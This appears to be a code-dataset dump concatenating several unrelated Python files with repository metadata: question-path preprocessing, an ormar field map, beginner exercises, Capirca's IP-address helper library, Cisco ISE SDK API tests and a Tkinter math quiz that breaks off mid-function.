if len(stack) == 0: break # indicating the end of searching
pop_idx = stack.pop()
for item in mat[pop_idx]: status[item] += 1
ptr = pop_idx
else:
stack.append(ptr)
for item in mat[ptr]: status[item] -= 1
comb = list(stack)
ret_comb_list.append(comb)
return ret_comb_list
def __nextPick__(self, ptr, status):
n = len(status)
for new_ptr in range(ptr + 1, n):
if status[new_ptr] == 1:
return new_ptr
return -1
def get_lookup_key(self, topic, rel_data):
if "constraints" in rel_data:
look_up_key = topic + "_" + str(rel_data["relations"]) + "_" + str(rel_data["constraints"])
else:
look_up_key = topic + "_" + str(rel_data["relations"])
return look_up_key
def deduplicate(self, input_path, src_dir, dest_dir):
questions = json.load(codecs.open(input_path, 'r', encoding='utf-8'))
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
for q in questions:
ques_id = q["QuestionId"]
ques_path = os.path.join(src_dir, ques_id + ".json")
if not os.path.exists(ques_path):
continue
print(ques_id)
main_entity_paths = json.load(codecs.open(ques_path, 'r', encoding='utf-8'))
look_up_keys = set()
main_entity_paths_dedup = {}
for topic in main_entity_paths:
paths = []
for path in main_entity_paths[topic]:
look_up_key = self.get_lookup_key(topic, path)
if look_up_key in look_up_keys:
continue
look_up_keys.add(look_up_key)
paths.append(path)
print("{} deduplicated to {}".format(len(main_entity_paths[topic]), len(paths)))
if len(paths) > 0:
main_entity_paths_dedup[topic] = paths
with open(os.path.join(dest_dir, ques_id + ".json"), 'w+') as fp:
json.dump(main_entity_paths_dedup, fp, indent=4)
def add_ids(self, src, dest):
questions = json.load(codecs.open(src, 'r', encoding='utf-8'))
to_write_json = []
for i, ques in enumerate(questions):
ques_id = "WebQTest-{}".format(i)
ques["QuestionId"] = ques_id
ques["ProcessedQuestion"] = ques["utterance"]
answer_set = set([])
target_value = ques['targetValue']
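            # targetValue is an s-expression of the form
            #   (list (description "Answer 1") (description "Answer 2"))
            # The slicing below strips the "(list " prefix and trailing ")",
            # then splits the "(description ...)" items; this reading of the
            # format is inferred from the offsets (6 and 13) used here.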
target_value = target_value[6: -1]
target_value = target_value.replace(') (', ')###(')
spt = target_value.split('###')
for item in spt:
ans_str = item[13: -1]
if ans_str.startswith('"') and ans_str.endswith('"'):
ans_str = ans_str[1: -1]
                if isinstance(ans_str, unicode):  # Python 2 text type
                    ans_str = ans_str.encode('utf-8')
answer_set.add(ans_str)
ques["Answers"] = list(answer_set)
to_write_json.append(ques)
with open(dest, 'w+') as fp:
json.dump(to_write_json, fp, indent=4)
def reward_with_max_f1(self, main_entity_paths):
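        # Each path's "reward" appears to be the (precision, recall, F1)
        # triple returned by metricUtils.compute_f1 above; index 2 (F1) is
        # used as the ranking score here and in the rescaling below.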
        max_reward = (0, 0, 0)
for topic in main_entity_paths:
for path in main_entity_paths[topic]:
if path["reward"][2] > max_reward[2]:
max_reward = path["reward"]
return max_reward
def rescale_rewards_max(self, src_dir, dest_dir):
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
files = [f for f in os.listdir(src_dir)]
for f in files:
if ".DS_Store" in f:
continue
ques_id = f.replace(".json", "")
#print(ques_id)
ques_path = os.path.join(src_dir, f)
main_entity_paths = json.load(codecs.open(ques_path, 'r', encoding='utf-8'))
max_ques_reward = self.reward_with_max_f1(main_entity_paths)
for topic in main_entity_paths:
for path in main_entity_paths[topic]:
path["rescaled_reward"] = [path["reward"][0], path["reward"][1], path["reward"][2]]
if max_ques_reward[2] > 0:
reward = path["rescaled_reward"]
reward[2] = float(reward[2]) * 1.0 / float(max_ques_reward[2])
if max_ques_reward[0] > 0:
reward[0] = min(1.0, float(reward[0]) * 1.0 / float(
max_ques_reward[0])) # hacky way of clipping
if max_ques_reward[1] > 0:
reward[1] = min(1.0, float(reward[1]) * 1.0 / float(
max_ques_reward[1])) # hacky way of clipping
with open(os.path.join(dest_dir, ques_id + ".json"), 'w+') as fp:
json.dump(main_entity_paths, fp, indent=4)
if __name__ == '__main__':
endPoint = WebQuestionsEndPoint()
# endPoint.add_ids(RAW_QUESTION_PATH, QUESTION_PATH)
# endPoint.write_top_entities(SMART_TOPIC_PATH, QUESTION_PATH, ALL_TOPIC_PATH)
# endPoint.get_cands(QUESTION_PATH, ALL_TOPIC_PATH, CANDS_DIR)
# endPoint.generate_query_graph_cands(QUESTION_PATH, ALL_TOPIC_PATH, CANDS_DIR, CANDS_WTIH_CONSTRAINTS_DIR)
# endPoint.deduplicate(QUESTION_PATH, CANDS_WTIH_CONSTRAINTS_DIR, CANDS_WTIH_CONSTRAINTS_DIR_DEDUP)
endPoint.rescale_rewards_max(CANDS_WTIH_CONSTRAINTS_DIR_DEDUP, CANDS_WTIH_CONSTRAINTS_RESCALED_DIR)
| [
"[email protected]"
]
| |
cb2811ebb7323dde07db3204b7cbb018b4aa24df | b5aef1178c9153ca0c4dd9823e5fa2a2bc64649f | /sqlalchemy_to_ormar/maps.py | 1a9e860b78fc123c5831dcea9f9bd6c03d9d63d5 | [
"MIT"
]
| permissive | collerek/sqlalchemy-to-ormar | 970a56c69ff03b7e32b11e4b1ebcb00c3b8d903c | 07c1595297221b31db86b3d34b3aad54fa3967da | refs/heads/main | 2023-04-23T10:41:04.426391 | 2021-05-16T14:10:38 | 2021-05-16T14:10:38 | 355,256,537 | 10 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,602 | py | from typing import Dict, Set, Type
import ormar
from ormar import Model
FIELD_MAP = {
"integer": ormar.Integer,
"tinyint": ormar.Integer,
"smallint": ormar.Integer,
"bigint": ormar.Integer,
"small_integer": ormar.Integer,
"big_integer": ormar.BigInteger,
"string": ormar.String,
"char": ormar.String,
"varchar": ormar.String,
"text": ormar.Text,
"mediumtext": ormar.Text,
"longtext": ormar.Text,
"float": ormar.Float,
"decimal": ormar.Decimal,
"date": ormar.Date,
"datetime": ormar.DateTime,
"timestamp": ormar.DateTime,
"time": ormar.Time,
"boolean": ormar.Boolean,
"bit": ormar.Boolean,
}
TYPE_SPECIFIC_PARAMETERS: Dict[str, Dict] = {
"string": {"max_length": {"key": "length", "default": 255}},
"varchar": {"max_length": {"key": "length", "default": 255}},
"char": {"max_length": {"key": "length", "default": 255}},
"decimal": {
"max_digits": {"key": "precision", "default": 18},
"decimal_places": {"key": "scale", "default": 6},
},
}
COMMON_PARAMETERS: Dict[str, Dict] = dict(
name={"key": "name", "default": None},
primary_key={"key": "primary_key", "default": False},
autoincrement={"key": "autoincrement", "default": False},
index={"key": "index", "default": False},
unique={"key": "unique", "default": False},
nullable={"key": "nullable", "default": None},
default={"key": "default", "default": None},
server_default={"key": "server_default", "default": None},
)
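# A note on the tables above (inferred from their structure, not from
# upstream docs): each entry maps an ormar field kwarg to the SQLAlchemy
# Column attribute it is read from ("key"), with "default" applied when the
# reflected column does not provide a value.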
PARSED_MODELS: Dict[Type, Type[Model]] = dict()
CURRENTLY_PROCESSED: Set = set()
| [
"[email protected]"
]
| |
96f12a1ab1eb7f33d8ce8497a6de454ae5054716 | 12fe05ebba89ea0f11d6f5d2fd8f047ee6369ff6 | /minmax3.py | c6f28978343f73c011e14f3c2fb0c7170c66fa0b | []
| no_license | daniilvarlamov/domzad | d467c4b9f51a1a640b0b001216849131c2463500 | 69e1b4c6fa27dc4d17499cfc6817c97d90f8391a | refs/heads/main | 2023-01-20T21:58:33.078060 | 2020-11-26T09:18:16 | 2020-11-26T09:18:16 | 303,324,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py | N = int(input("Enter the number of rectangles: "))
for i in range(N):
    a = int(input("Enter the sides of the rectangle: "))
    b = int(input())
    P = 2 * (a + b)
    if i == 0:  # the first rectangle initializes the running maximum
        Max = P
    if P > Max:
        Max = P
print(Max)
| [
"[email protected]"
]
| |
c751ca648f50a29345bf726fcde090faab5448ec | 7019f0dd96c69fb5c66a0840ed989e86e489496a | /Exercises Python Brasil/01 - Estrutura Sequencial/18.py | d487f416b6ee013961afddee3aaf5529929b9ba4 | []
| no_license | leonardokiyota/Python-Training | e1d8343156d96fd085e1dbae8c48770ae0725347 | 38a9ce8cb5558f2a73060243d458ea92d91bf945 | refs/heads/master | 2021-01-10T08:40:30.100115 | 2016-01-12T01:36:30 | 2016-01-12T01:36:30 | 49,223,376 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | # -*- coding: utf-8 -*-
"""
Write a program that asks for the size of a file to download (in MB) and the
speed of an Internet link (in Mbps), then computes and reports the approximate
time to download the file over this link (in minutes).
""" | [
"[email protected]"
]
| |
dae66138f278fea5834382498b52becae34edd5a | 063934d4e0bf344a26d5679a22c1c9e5daa5b237 | /margrave-examples-internal/capirca-margrave/capirca-r242-MODIFIED/lib/nacaddr.py | fc06f176005b79e1c4e5f83d4af8c3da2abb3c74 | [
"Apache-2.0"
]
| permissive | tnelson/Margrave | 329b480da58f903722c8f7c439f5f8c60b853f5d | d25e8ac432243d9ecacdbd55f996d283da3655c9 | refs/heads/master | 2020-05-17T18:43:56.187171 | 2014-07-10T03:24:06 | 2014-07-10T03:24:06 | 749,146 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 7,241 | py | #!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A subclass of the ipaddr library that includes comments for ipaddr objects."""
__author__ = '[email protected] (Tony Watson)'
from third_party import ipaddr
def IP(ipaddress, comment='', token=''):
"""Take an ip string and return an object of the correct type.
Args:
    ipaddress: the IP address string.
    comment: optional comment field.
    token: optional token name where this address was extracted from.
Returns:
ipaddr.IPv4 or ipaddr.IPv6 object or raises ValueError.
Raises:
ValueError: if the string passed isn't either a v4 or a v6 address.
Notes:
    this is sort of a poor man's factory method.
"""
a = ipaddr.IPNetwork(ipaddress)
if a.version == 4:
return IPv4(ipaddress, comment, token)
elif a.version == 6:
return IPv6(ipaddress, comment, token)
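# For example (illustrative only):
#   addr = IP('10.0.0.0/8', comment='rfc1918', token='INTERNAL')
#   addr.text -> 'rfc1918'; addr.token -> 'INTERNAL'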
class IPv4(ipaddr.IPv4Network):
"""This subclass allows us to keep text comments related to each object."""
def __init__(self, ip_string, comment='', token=''):
ipaddr.IPv4Network.__init__(self, ip_string)
self.text = comment
self.token = token
self.parent_token = token
def AddComment(self, comment=''):
"""Append comment to self.text, comma seperated.
Don't add the comment if it's the same as self.text.
Args: comment
"""
if self.text:
if comment and comment not in self.text:
self.text += ', ' + comment
else:
self.text = comment
def supernet(self, prefixlen_diff=1):
"""Override ipaddr.IPv4 supernet so we can maintain comments.
See ipaddr.IPv4.Supernet for complete documentation.
"""
if self.prefixlen == 0:
return self
if self.prefixlen - prefixlen_diff < 0:
raise PrefixlenDiffInvalidError(
'current prefixlen is %d, cannot have a prefixlen_diff of %d' % (
self.prefixlen, prefixlen_diff))
ret_addr = IPv4(ipaddr.IPv4Network.supernet(self, prefixlen_diff),
comment=self.text, token=self.token)
return ret_addr
# Backwards compatibility name from v1.
Supernet = supernet
class IPv6(ipaddr.IPv6Network):
"""This subclass allows us to keep text comments related to each object."""
def __init__(self, ip_string, comment='', token=''):
ipaddr.IPv6Network.__init__(self, ip_string)
self.text = comment
self.token = token
self.parent_token = token
def supernet(self, prefixlen_diff=1):
"""Override ipaddr.IPv6Network supernet so we can maintain comments.
See ipaddr.IPv6Network.Supernet for complete documentation.
"""
if self.prefixlen == 0:
return self
if self.prefixlen - prefixlen_diff < 0:
raise PrefixlenDiffInvalidError(
'current prefixlen is %d, cannot have a prefixlen_diff of %d' % (
self.prefixlen, prefixlen_diff))
ret_addr = IPv6(ipaddr.IPv6Network.supernet(self, prefixlen_diff),
comment=self.text, token=self.token)
return ret_addr
# Backwards compatibility name from v1.
Supernet = supernet
def AddComment(self, comment=''):
"""Append comment to self.text, comma seperated.
Don't add the comment if it's the same as self.text.
Args: comment
"""
if self.text:
if comment and comment not in self.text:
self.text += ', ' + comment
else:
self.text = comment
def CollapseAddrListRecursive(addresses):
"""Recursively loops through the addresses, collapsing concurent netblocks.
Example:
ip1 = ipaddr.IPv4Network('1.1.0.0/24')
ip2 = ipaddr.IPv4Network('1.1.1.0/24')
ip3 = ipaddr.IPv4Network('1.1.2.0/24')
ip4 = ipaddr.IPv4Network('1.1.3.0/24')
ip5 = ipaddr.IPv4Network('1.1.4.0/24')
ip6 = ipaddr.IPv4Network('1.1.0.1/22')
CollapseAddrRecursive([ip1, ip2, ip3, ip4, ip5, ip6]) ->
[IPv4Network('1.1.0.0/22'), IPv4Network('1.1.4.0/24')]
Note, this shouldn't be called directly, but is called via
  CollapseAddrList([])
Args:
addresses: List of IPv4 or IPv6 objects
Returns:
List of IPv4 or IPv6 objects (depending on what we were passed)
"""
ret_array = []
optimized = False
for cur_addr in addresses:
if not ret_array:
ret_array.append(cur_addr)
continue
if ret_array[-1].Contains(cur_addr):
# save the comment from the subsumed address
ret_array[-1].AddComment(cur_addr.text)
optimized = True
elif cur_addr == ret_array[-1].Supernet().Subnet()[1]:
ret_array.append(ret_array.pop().Supernet())
# save the text from the subsumed address
ret_array[-1].AddComment(cur_addr.text)
optimized = True
else:
ret_array.append(cur_addr)
if optimized:
return CollapseAddrListRecursive(ret_array)
return ret_array
def CollapseAddrList(addresses):
"""Collapse an array of IP objects.
  Example: CollapseAddrList(
[IPv4('1.1.0.0/24'), IPv4('1.1.1.0/24')]) -> [IPv4('1.1.0.0/23')]
Note: this works just as well with IPv6 addresses too.
Args:
addresses: list of ipaddr.IPNetwork objects
Returns:
list of ipaddr.IPNetwork objects
"""
return CollapseAddrListRecursive(
sorted(addresses, key=ipaddr._BaseNet._get_networks_key))
def SortAddrList(addresses):
"""Return a sorted list of nacaddr objects."""
return sorted(addresses, key=ipaddr._BaseNet._get_networks_key)
def RemoveAddressFromList(superset, exclude):
"""Remove a single address from a list of addresses.
Args:
superset: a List of nacaddr IPv4 or IPv6 addresses
exclude: a single nacaddr IPv4 or IPv6 address
Returns:
a List of nacaddr IPv4 or IPv6 addresses
"""
ret_array = []
for addr in superset:
if exclude == addr or addr in exclude:
# this is a bug in ipaddr v1. IP('1.1.1.1').AddressExclude(IP('1.1.1.1'))
# raises an error. Not tested in v2 yet.
pass
elif exclude.version == addr.version and exclude in addr:
ret_array.extend([IP(x) for x in addr.AddressExclude(exclude)])
else:
ret_array.append(addr)
return ret_array
def AddressListExclude(superset, excludes):
"""Remove a list of addresses from another list of addresses.
Args:
superset: a List of nacaddr IPv4 or IPv6 addresses
excludes: a List nacaddr IPv4 or IPv6 addresses
Returns:
a List of nacaddr IPv4 or IPv6 addresses
"""
superset = CollapseAddrList(superset)
excludes = CollapseAddrList(excludes)
ret_array = []
for ex in excludes:
superset = RemoveAddressFromList(superset, ex)
return CollapseAddrList(superset)
ExcludeAddrs = AddressListExclude
class PrefixlenDiffInvalidError(ipaddr.NetmaskValueError):
"""Holdover from ipaddr v1."""
if __name__ == '__main__':
pass
| [
"[email protected]"
]
| |
141b42291593793cc3abb2c8eb5ac5c5b1d0950b | b9a900189095b6af89fb5b941773edaee69bd47d | /InformationAPI/information/migrations/0004_auto_20201209_1427.py | 99cc52a1662a6739531891e8388c62b500bc13f7 | []
| no_license | tyagisen/information | 6aa84a0b44920f69efa7ac2bdf62278c4260efaf | ecc6dfd902632603c5080a6e330c3b57462edd97 | refs/heads/master | 2023-01-30T22:18:22.738513 | 2020-12-10T01:50:00 | 2020-12-10T01:50:00 | 318,956,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py | # Generated by Django 3.1.3 on 2020-12-09 14:27
import ckeditor.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('information', '0003_auto_20201207_0911'),
]
operations = [
migrations.AlterField(
model_name='information',
name='info_list',
field=ckeditor.fields.RichTextField(),
),
]
| [
"[email protected]"
]
| |
d35605db5bdf283207a2c171638328c4c8b53252 | 4e30d990963870478ed248567e432795f519e1cc | /tests/api/v3_1_1/test_nbar_app.py | 13a1bcd9798917799871178339c1315dd3a03d61 | [
"MIT"
]
| permissive | CiscoISE/ciscoisesdk | 84074a57bf1042a735e3fc6eb7876555150d2b51 | f468c54998ec1ad85435ea28988922f0573bfee8 | refs/heads/main | 2023-09-04T23:56:32.232035 | 2023-08-25T17:31:49 | 2023-08-25T17:31:49 | 365,359,531 | 48 | 9 | MIT | 2023-08-25T17:31:51 | 2021-05-07T21:43:52 | Python | UTF-8 | Python | false | false | 9,399 | py | # -*- coding: utf-8 -*-
"""IdentityServicesEngineAPI nbar_app API fixtures and tests.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import pytest
from fastjsonschema.exceptions import JsonSchemaException
from ciscoisesdk.exceptions import MalformedRequest
from ciscoisesdk.exceptions import ciscoisesdkException
from tests.environment import IDENTITY_SERVICES_ENGINE_VERSION
pytestmark = pytest.mark.skipif(IDENTITY_SERVICES_ENGINE_VERSION != '3.1.1', reason='version does not match')
def is_valid_get_nbar_apps(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
assert hasattr(obj, 'status_code')
json_schema_validate('jsd_1e8a476ad8455fdebad0d8973c810495_v3_1_1').validate(obj.response)
return True
def get_nbar_apps(api):
endpoint_result = api.nbar_app.get_nbar_apps(
filter='value1,value2',
filter_type='string',
page=0,
size=0,
sort='string',
sort_by='string'
)
return endpoint_result
@pytest.mark.nbar_app
def test_get_nbar_apps(api, validator):
try:
assert is_valid_get_nbar_apps(
validator,
get_nbar_apps(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def get_nbar_apps_default(api):
endpoint_result = api.nbar_app.get_nbar_apps(
filter=None,
filter_type=None,
page=None,
size=None,
sort=None,
sort_by=None
)
return endpoint_result
@pytest.mark.nbar_app
def test_get_nbar_apps_default(api, validator):
try:
assert is_valid_get_nbar_apps(
validator,
get_nbar_apps_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_create_nbar_app(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
assert hasattr(obj, 'status_code')
json_schema_validate('jsd_ccc30178afce5e51a65e96cd95ca1773_v3_1_1').validate(obj.response)
return True
def create_nbar_app(api):
endpoint_result = api.nbar_app.create_nbar_app(
active_validation=False,
description='string',
id='string',
name='string',
network_identities=[{'ports': 'string', 'protocol': 'string'}],
payload=None
)
return endpoint_result
@pytest.mark.nbar_app
def test_create_nbar_app(api, validator):
try:
assert is_valid_create_nbar_app(
validator,
create_nbar_app(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def create_nbar_app_default(api):
endpoint_result = api.nbar_app.create_nbar_app(
active_validation=False,
description=None,
id=None,
name=None,
network_identities=None,
payload=None
)
return endpoint_result
@pytest.mark.nbar_app
def test_create_nbar_app_default(api, validator):
try:
assert is_valid_create_nbar_app(
validator,
create_nbar_app_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_get_nbar_app_by_id(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
assert hasattr(obj, 'status_code')
json_schema_validate('jsd_61e99726f3745554a07ee102f74fe3bd_v3_1_1').validate(obj.response)
return True
def get_nbar_app_by_id(api):
endpoint_result = api.nbar_app.get_nbar_app_by_id(
id='string'
)
return endpoint_result
@pytest.mark.nbar_app
def test_get_nbar_app_by_id(api, validator):
try:
assert is_valid_get_nbar_app_by_id(
validator,
get_nbar_app_by_id(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def get_nbar_app_by_id_default(api):
endpoint_result = api.nbar_app.get_nbar_app_by_id(
id='string'
)
return endpoint_result
@pytest.mark.nbar_app
def test_get_nbar_app_by_id_default(api, validator):
try:
assert is_valid_get_nbar_app_by_id(
validator,
get_nbar_app_by_id_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_update_nbar_app_by_id(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
assert hasattr(obj, 'status_code')
json_schema_validate('jsd_b55622f1671359919573b261ba16ea71_v3_1_1').validate(obj.response)
return True
def update_nbar_app_by_id(api):
endpoint_result = api.nbar_app.update_nbar_app_by_id(
active_validation=False,
description='string',
id='string',
name='string',
network_identities=[{'ports': 'string', 'protocol': 'string'}],
payload=None
)
return endpoint_result
@pytest.mark.nbar_app
def test_update_nbar_app_by_id(api, validator):
try:
assert is_valid_update_nbar_app_by_id(
validator,
update_nbar_app_by_id(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def update_nbar_app_by_id_default(api):
endpoint_result = api.nbar_app.update_nbar_app_by_id(
active_validation=False,
id='string',
description=None,
name=None,
network_identities=None,
payload=None
)
return endpoint_result
@pytest.mark.nbar_app
def test_update_nbar_app_by_id_default(api, validator):
try:
assert is_valid_update_nbar_app_by_id(
validator,
update_nbar_app_by_id_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_delete_nbar_app_by_id(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
assert hasattr(obj, 'status_code')
json_schema_validate('jsd_44d289d5685350f5b00f130db0a45142_v3_1_1').validate(obj.response)
return True
def delete_nbar_app_by_id(api):
endpoint_result = api.nbar_app.delete_nbar_app_by_id(
id='string'
)
return endpoint_result
@pytest.mark.nbar_app
def test_delete_nbar_app_by_id(api, validator):
try:
assert is_valid_delete_nbar_app_by_id(
validator,
delete_nbar_app_by_id(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def delete_nbar_app_by_id_default(api):
endpoint_result = api.nbar_app.delete_nbar_app_by_id(
id='string'
)
return endpoint_result
@pytest.mark.nbar_app
def test_delete_nbar_app_by_id_default(api, validator):
try:
assert is_valid_delete_nbar_app_by_id(
validator,
delete_nbar_app_by_id_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
| [
"[email protected]"
]
| |
d0bd583a39afd75f5fe496a88755cae09a18845d | b3309601462404e22f230fd836f05b8ae2570282 | /03_Generate_question_v4.py | c2af3ee62de1029d3824b6c8f33b19f88ebd6a48 | []
| no_license | Wardl1/Math-Quiz | cf441c6213a1cd5c239acc7b71611af1a10f5dfa | 377050ee8a15f8b03994b2ed8b97602a61a2a6c4 | refs/heads/main | 2023-07-24T23:32:45.188970 | 2021-09-05T07:56:37 | 2021-09-05T07:56:37 | 392,872,129 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,944 | py | """Component 3 Generate_Questions version 2
this version fixes the negative answers for the subtraction questions and
keeps the question heading up to date with the current question number
"""
from tkinter import *
from functools import partial # To prevent unwanted additional windows
import random
class MathQuiz:
def __init__(self):
# Formatting variables
background_color = "#66FFFF" # light blue
# Main menu GUI frame
self.main_menu_frame = Frame(width=300, height=300,
bg=background_color, pady=10)
self.main_menu_frame.grid()
# Math Quiz heading (row 0)
self.MathQuiz_label = Label(self.main_menu_frame,
text="Math Quiz",
font=("Arial", "16", "bold"),
bg=background_color,
padx=10, pady=10)
self.MathQuiz_label.grid(row=0)
# Simple instructions given
        self.instruction_label = Label(self.main_menu_frame,
                                       text="Pick one area of math"
                                       " to work on \n and answer "
                                       "the 10 questions given.",
                                       font=("Arial", "12", "italic"),
                                       bg=background_color,
                                       padx=10, pady=10)
        self.instruction_label.grid(row=1)
# Addition button (row 2)
self.addition_button = Button(self.main_menu_frame, text="Addition",
font=("Arial", "14"),
padx=10, pady=10,
width=10,
bg="#008CFF", # darker blue
fg="white",
command=self.math_addition)
self.addition_button.grid(row=2)
# Subtraction button (row 3)
self.subtraction_button = Button(self.main_menu_frame,
text="Subtraction",
font=("Arial", "14"),
padx=10, pady=10,
width=10,
bg="#008CFF", # darker blue
fg="white",
command=self.math_subtraction)
self.subtraction_button.grid(row=3)
# All combined button (row 4)
self.combined_button = Button(self.main_menu_frame,
text="All Combined",
font=("Arial", "14"),
padx=10, pady=10,
width=10,
bg="#008CFF", # darker blue
fg="white",
command=self.all_combined)
self.combined_button.grid(row=4)
# math_addition function for when the addition_button is pressed
def math_addition(self):
print("1 + 1 = ") # print statement to check function works
# opens question GUI
QuestionGUI(self, quest_type="add").generate_question()
# math_subtraction function for when the subtraction_button is pressed
def math_subtraction(self):
print("1 - 1 = ") # print statement to check function works
# opens question GUI
QuestionGUI(self, quest_type="sub").generate_question()
# all_combined function for when the combined_button is pressed
def all_combined(self):
print("1 + / - 1 = ") # print statement to check function works
# opens question GUI
QuestionGUI(self, quest_type="both").generate_question()
class QuestionGUI:
def __init__(self, partner, quest_type):
# Formatting variables
background_color = "#3399FF" # darker blue
# disable Main menu buttons
partner.addition_button.config(state=DISABLED)
partner.subtraction_button.config(state=DISABLED)
partner.combined_button.config(state=DISABLED)
        # sets up question type to determine whether it's an add,
        # sub or combined question
self.question_type = quest_type
# sets up question answer which will be needed to evaluate
# if the user is correct
self.question_answer = ""
# sets up question number so that the question heading updates
# when next button is pressed
self.question_number = 0
        # sets up child window (i.e. the question box)
self.question_box = Toplevel()
        # if users press the cross at top, closes the question window and re-enables the menu
self.question_box.protocol('WM_DELETE_WINDOW',
partial(self.close_question, partner))
# Question Frame
self.question_frame = Frame(self.question_box, width=300,
bg=background_color)
self.question_frame.grid()
# Question Heading (row 0)
self.question_heading_label = Label(self.question_frame,
text="Question 1/10",
font="Arial 16 bold",
bg=background_color,
padx=10, pady=10)
self.question_heading_label.grid(row=0)
# User question to answer (row 1)
self.question_label = Label(self.question_frame,
font="Arial 12 bold", wrap=250,
justify=CENTER, bg=background_color,
padx=10, pady=10)
self.question_label.grid(row=1)
# Answer entry box (row 2)
self.answer_entry = Entry(self.question_frame, width=20,
font="Arial 14 bold",
bg="white")
self.answer_entry.grid(row=2)
# Incorrect or correct statement (row 3)
self.evaluator_label = Label(self.question_frame,
font="Arial 14 bold",
fg="green",
bg=background_color,
pady=10, text="Correct")
self.evaluator_label.grid(row=3)
# Sets up new frame for buttons to get a nice layout
self.button_frame = Frame(self.question_box, width=300,
bg=background_color)
self.button_frame.grid(row=1)
# Close button (row 0, column 0)
self.close_button = Button(self.button_frame, text="Close",
width=8, bg="light grey",
font="arial 10 bold",
command=partial(self.close_question,
partner))
self.close_button.grid(row=0, column=0)
# Enter button (row 0, column 1)
self.enter_button = Button(self.button_frame, text="Enter",
width=8, bg="light grey",
font="arial 10 bold",
command=partial(self.enter_question))
self.enter_button.grid(row=0, column=1)
# Next button (row 0, column 2)
self.next_button = Button(self.button_frame, text="Next",
width=8, bg="light grey",
font="arial 10 bold",
command=partial(self.generate_question))
self.next_button.grid(row=0, column=2)
def generate_question(self):
self.question_number += 1
# all combined variable to switch between add and sub
all_combined = ""
num_1 = random.randint(0, 10) # generates random number
num_2 = random.randint(0, 10)
# sets up question variable which is the text for the question_label
question = ""
if self.question_type == "both":
# chooses between add and sub to generate both questions
all_combined = random.choice(["add", "sub"])
if self.question_type == "add" or all_combined == "add":
question = ("{} + {} = ".format(num_1, num_2)) # creates question
self.question_answer = num_1 + num_2 # works out answer
elif self.question_type == "sub" or all_combined == "sub":
if num_1 > num_2:
# creates question
question = ("{} - {} = ".format(num_1, num_2))
self.question_answer = num_1 - num_2 # works out answer
else:
# creates question
question = ("{} - {} = ".format(num_2, num_1))
self.question_answer = num_2 - num_1 # works out answer
        # update the question label with the newly generated question
self.question_label.config(text=question)
self.question_heading_label.config(text="Question {}/10".
format(self.question_number))
if self.question_number == 10:
self.next_button.config(state=DISABLED)
def close_question(self, partner):
# Put main menu button's back to normal...
partner.addition_button.config(state=NORMAL)
partner.subtraction_button.config(state=NORMAL)
